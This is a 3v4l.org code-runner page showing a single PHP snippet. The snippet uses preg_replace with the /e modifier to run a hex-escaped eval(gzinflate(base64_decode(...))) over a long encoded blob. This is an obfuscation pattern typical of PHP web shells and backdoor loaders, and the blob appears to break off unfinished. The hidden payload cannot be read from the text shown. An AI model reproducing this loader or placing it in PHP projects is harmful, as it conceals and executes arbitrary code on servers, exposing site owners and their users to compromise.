3v4l.org

run code in 300+ PHP versions simultaneously
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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